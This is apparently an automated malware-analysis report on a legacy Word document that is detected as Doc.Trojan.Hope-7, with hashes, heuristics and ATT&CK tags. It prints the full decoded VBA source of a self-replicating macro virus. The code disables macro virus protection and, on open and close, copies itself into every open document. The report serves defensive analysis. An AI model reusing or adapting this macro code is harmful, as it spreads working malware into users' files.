Office (OLE) malware analysis — malicious · 6753af1b3f5eff12

MALICIOUS

Office (OLE)

37.5 KB Created: 1999-07-29 06:30:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14

MD5: c8cbf119bf77967b9ca0398d50ba2cce SHA-1: 010112c8ea92070c4e15771cf4958cb6ce0a5dae SHA-256: 6753af1b3f5eff129bd9a1d131d6ec6ba6c9cffb8d3a570bdb37f1f22e4cf24b

200 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is identified as malicious by ClamAV with signatures 'Doc.Trojan.Hope-7' and 'Win.Trojan.W-420'. It contains VBA macros, including a Document_Open macro, which is a common technique for executing malicious code when the document is opened. The macro code appears to re-inject itself and save the document, suggesting an attempt to ensure execution or persistence, likely as part of a downloader or droppper functionality.

Heuristics 4

ClamAV: Doc.Trojan.Hope-7 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Trojan.Hope-7
VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	884 bytes
SHA-256: `3499a3d40ce8515f4e0b8cf6c9643982182cfcd0f148dc0f6bb3a0d7b2684db5`
Detection ClamAV: Win.Trojan.W-420 Obfuscation or payload: unlikely
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Sub SuperPutz(): Options.VirusProtection = ((2 * 2) - 4): Options.ConfirmConversions = ((4 * 4) - 16) Putz = MacroContainer.VBProject.VBComponents.Item(1).CodeModule.Lines(1, MacroContainer.VBProject.VBComponents.Item(1).CodeModule.CountOfLines) For X = 1 To Documents.Count: With Documents.Item(X).VBProject.VBComponents.Item(1).CodeModule .DeleteLines 1, .CountOfLines: .AddFromString (Putz): End With: Documents.Item(X).SaveAs FileName:=Documents.Item(X).FullName: Next: End Sub Private Sub Document_Open(): SuperPutz: End Sub Private Sub Document_Close(): SuperPutz: End Sub 'Putz... SuperPutz! Lys KovicK Said: Haha

Open this report in the interactive analyzer, or submit your own file for analysis.